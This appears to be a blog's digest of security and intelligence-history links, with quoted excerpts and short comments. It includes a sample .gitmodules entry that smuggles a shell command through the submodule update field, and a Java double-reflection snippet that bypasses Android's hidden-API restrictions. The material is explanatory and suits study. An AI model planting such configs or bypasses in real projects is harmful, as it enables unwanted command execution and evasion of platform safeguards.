> In this paper I present an analysis of 1,976 unsolicited answers received from the targets of a malicious email campaign, who were mostly unaware that they were not contacting the real sender of the malicious messages. I received the messages because the spammers, whom I had described previously on my blog, decided to take revenge by putting my email address in the ‘reply-to’ field of a malicious email campaign. Many of the victims were unaware that the message they had received was fake and contained malware. Some even asked me to resend the malware as it had been blocked by their anti-virus product. I have read those 1,976 messages, analysed and classified victims’ answers, and present them here. The key takeaway is that we need to train users, but at the same time we should not count on them to react properly to Internet threats. Despite dealing with cybercrime victims daily for the last seven years I was surprised by most of the reactions and realized how little we, as the security industry, know about the average Internet user’s ability (or rather inability) to identify threats online. We need to build solutions that will protect users, without their knowledge, sometimes against their will, from their ability to harm themselves.
> The fifth group is actually the most worrying. I call this group ‘MY ANTI-VIRUS WORKED, PLEASE SEND AGAIN’, as these are recipients who mention that their security product (mostly anti-virus) warned them against an infected file, but they wanted the file to be resent because they could not open it. The group consisted of 44 individuals (2.35%).
How to explain the KGB's amazing success identifying CIA agents in the field?
> Their argument was simple. How could these disasters have happened with such regularity if the agency had not been penetrated by Soviet moles? The problem with this line of thought was that it did not so much overestimate CIA security as underestimate the brainpower of their Russian counterparts.
> Despite being highly privileged and processing untrusted input by design, it is unsandboxed and has poor mitigation coverage. Any vulnerabilities in this process are critical, and easily accessible to remote attackers.
EASYCHAIR - CIA covert listening devices
> EASYCHAIR – also written as Easy Chair or EC – was the codename of a super secret research project, initiated by the US Central Intelligence Agency (CIA), aiming to develop covert listening devices (bugs) based on the principle of the Resonant Cavity Microphone – also known as The Great Seal Bug or The Thing – that had been found in 1952 in the study of the US ambassador’s residency in Moscow, hidden in a donated wooden carving of the Great Seal of the United States.
> Upon discovery of The Thing, many US agencies – including the CIA – investigated the possibility of using the new – hitherto unknown – technology to their own advantage. The secret research took place in the Netherlands at the Dutch Radar Laboratory (NRP) in Noordwijk.
CPU Introspection: Intel Load Port Snooping
> We’re going to go into a unique technique for observing and sequencing all load port traffic on Intel processors. By using a CPU vulnerability from the MDS set of vulnerabilities, specifically Microarchitectural Load Port Data Sampling (MLPDS, CVE-2018-12127), we are able to observe values which fly by on the load ports. Since (to my knowledge) all loads must end up going through load ports, regardless of requestor, origin, or caching, this means in theory, all contents of loads ever performed can be observed. By using a creative scanning technique we’re able to not only view “random” loads as they go by, but sequence loads to determine the ordering and timing of them.
> We’ll go through some examples demonstrating that this technique can be used to view all loads as they are performed on a cycle-by-cycle basis. We’ll look into an interesting case of the micro-architecture updating accessed and dirty bits using a microcode assist. These are invisible loads dispatched on the CPU on behalf of the user when a page is accessed for the first time.
Hackers hit Norsk Hydro with ransomware
> The breach last March would ultimately affect all 35,000 Norsk Hydro employees across 40 countries, locking the files on thousands of servers and PCs. The financial impact would eventually approach $71 million.
> All of that damage had been set in motion three months earlier when one employee unknowingly opened an infected email from a trusted customer. That allowed hackers to invade the IT infrastructure and covertly plant their virus.
This is kinda fluffy, but somewhat interesting.
So We Don't Have A Solution For Catalina... Yet
> With the release of macOS 10.15 (Catalina), Apple has dropped support for running 32-bit executables and removed the 32-bit versions of system frameworks and libraries. Most Windows applications our users run with CrossOver are 32-bit and CrossOver uses a 32-bit Mac executable, system frameworks, and libraries to run them. This will break with Catalina.
And then comes the fun part:
> We have built a modified version of the standard C language compiler for macOS, Clang, to automate many of the changes we need to make to Wine’s behavior without pervasive changes to Wine’s source code.
> First, our version of Clang understands both 32- and 64-bit pointers. We are able to control from a broad level down to a detailed level which pointers in Wine’s source code need to be 32-bit and which 64-bit. Any code which substitutes for Windows at the interface with the Windows app has to use 32-bit pointers. On the other hand, the interfaces to the system libraries are always 64-bit.
Git submodule update command execution
> The git submodule update operation can lead to execution of arbitrary shell commands defined in the .gitmodules file.
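A hypothetical `.gitmodules` entry showing the shape of such a payload (the submodule name, URL, and command here are illustrative, and the exact triggering conditions depend on the git version): git treats an update value beginning with "!" as a shell command to run when the submodule is updated, a form normally meant only for the local .git/config.

```ini
# Hypothetical malicious .gitmodules: the "!" prefix tells git to run
# the rest of the value as a shell command during "git submodule update".
[submodule "lib"]
	path = lib
	url = https://example.com/lib.git
	update = !echo pwned
```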
> Modern processors are being pushed to perform faster than ever before - and with this comes increases in heat and power consumption. To manage this, many chip manufacturers allow frequency and voltage to be adjusted as and when needed. But more than that, they offer the user the opportunity to modify the frequency and voltage through privileged software interfaces. With Plundervolt we showed that these software interfaces can be exploited to undermine the system’s security. We were able to corrupt the integrity of Intel SGX on Intel Core processors by controlling the voltage when executing enclave computations. This means that even Intel SGX’s memory encryption/authentication technology cannot protect against Plundervolt.
Not sure anyone should care about SGX anymore, all things considered, but for completeness, here’s another one.
Introducing iVerify, the security toolkit for iPhone users
> Not only does iVerify help you keep your data confidential and limit data sharing, it helps protect the integrity of your device. It’s normally almost impossible to tell if your iPhone has been hacked, but our app gives you a heads-up. iVerify periodically scans your device for anomalies that might indicate it’s been compromised, gives you a detailed report on what was detected, and provides actionable advice on how to proceed.
drgn - Scriptable debugger library
> drgn (pronounced “dragon“) is a debugger-as-a-library. In contrast to existing debuggers like GDB which focus on breakpoint-based debugging, drgn excels in live introspection. drgn exposes the types and variables in a program for easy, expressive scripting in Python.
Analyzing Android's CVE-2019-2215 (/dev/binder UAF)
> Over the past few weeks, those of you who frequent the DAY streams over on our Twitch may have seen me working on trying to understand the recent Android Binder Use-After-Free (UAF) published by Google’s Project Zero (p0). This bug is actually not new, the issue was discovered and fixed in the mainline kernel in February 2018, however, p0 discovered many popular devices did not receive the patch downstream. Some of these devices include the Pixel 2, the Huawei P20, and Samsung Galaxy S7, S8, and S9 phones. I believe many of these devices received security patches within the last couple weeks that finally killed the bug.
> After a few streams of poking around with a kernel debugger on a virtual machine (running Android-x86), and testing with a vulnerable Pixel 2, I’ve come to understand the exploit written by Jann Horn and Maddie Stone pretty well. Without an understanding of Binder (the binder_thread object specifically), as well as how Vectored I/O works, the exploit can be pretty confusing. It’s also quite clever how they exploited this issue, so I thought it would be cool to write up how the exploit works.
It’s super easy to bypass Android’s hidden API restrictions
> The API blacklist tracks who’s calling a function. If the source isn’t exempt, it crashes. In the first example, the source is the app. However, in the second example, the source is the system itself. Instead of using reflection to get what we want directly, we’re using it to tell the system to get what we want. Since the source of the call to the hidden function is the system, the blacklist doesn’t affect us anymore.
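The trick quoted above is often called "double reflection." A minimal sketch of the mechanics on a plain JVM, where hiddenGreeting is a made-up stand-in for a blacklisted Android API; on Android the point is that the reflective lookup's recorded caller becomes java.lang.Class, which lives on the boot class path and is exempt from the blacklist:

```java
import java.lang.reflect.Method;

public class MetaReflection {
    // Stand-in for a blacklisted hidden method (hypothetical name).
    private static String hiddenGreeting() { return "hello from a hidden API"; }

    public static void main(String[] args) throws Exception {
        // Step 1: obtain getDeclaredMethod itself via reflection.
        Method getDeclaredMethod = Class.class.getMethod(
                "getDeclaredMethod", String.class, Class[].class);

        // Step 2: ask the *system* to resolve the target method for us.
        // On Android, the caller the runtime sees is now java.lang.Class,
        // so the hidden-API check no longer applies.
        Method hidden = (Method) getDeclaredMethod.invoke(
                MetaReflection.class, "hiddenGreeting", new Class[0]);
        hidden.setAccessible(true);

        System.out.println(hidden.invoke(null));
    }
}
```

On a desktop JVM this only demonstrates that reflection can bootstrap itself; the blacklist bypass is specific to how Android's runtime attributes the caller of the lookup.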
The call is coming from inside the system!
The 3 A.M. Phone Call
> It went to a national security adviser, Zbigniew Brzezinski, who was awakened on 9 November 1979 to be told that the North American Aerospace Defense Command (NORAD), the combined U.S.–Canada military command, was reporting a Soviet missile attack. Just before Brzezinski was about to call President Carter, the NORAD warning turned out to be a false alarm. It was one of those moments in Cold War history when top officials believed they were facing the ultimate threat. The apparent cause? The routine testing of an overworked computer system.
Gomium pwn challenge
> By doing the above we create a race where we access the implementation of X with the context of good. That means that if we “win”, then inside the unsafe implementation, f from the bad context will be used as a function pointer instead of a pointer to an integer. This will result in calling an arbitrary address (0x1337 in our case), which sounds quite promising.
Exploiting torn reads for fun and profit.
History of Information
Lots of little facts organized in various ways.
> Light Commands is a vulnerability of MEMS microphones that allows attackers to remotely inject inaudible and invisible commands into voice assistants, such as Google Assistant, Amazon Alexa, Facebook Portal, and Apple Siri, using light.
> In our paper we demonstrate this effect, successfully using light to inject malicious commands into several voice controlled devices such as smart speakers, tablets, and phones across large distances and through glass windows.
Two New Tools that Tame the Treachery of Files
> Parsing is hard, even when a file format is well specified. But when the specification is ambiguous, it leads to unintended and strange parser and interpreter behaviors that make file formats susceptible to security vulnerabilities. What if we could automatically generate a “safe” subset of any file format, along with an associated, verified parser? That’s our collective goal in Dr. Sergey Bratus’s DARPA SafeDocs program.
> We’ve developed two new tools that take the pain out of parsing and make file formats safer:
> PolyFile: A polyglot-aware file identification utility with manually instrumented parsers that can semantically label the bytes of a file hierarchically; and
> PolyTracker: An automated instrumentation framework that efficiently tracks input file taint through the execution of a program.
Defense at Scale
> Last year, my colleague Chris Rohlf gave a keynote at BSidesNOLA entitled “Offense at Scale”. Offense sounds fun. Pwn all the things. And you’re always going to win! And normally I’m a big fan of being massively offensive. Unfortunately, I find myself on the defense when it comes to information security.
> Here’s how you defend at scale. Can’t be done. The end. Everything’s fucked. You’re pwned.
Plenty of good points here. Also a fun read.
Confession of Kim Philby made public for first time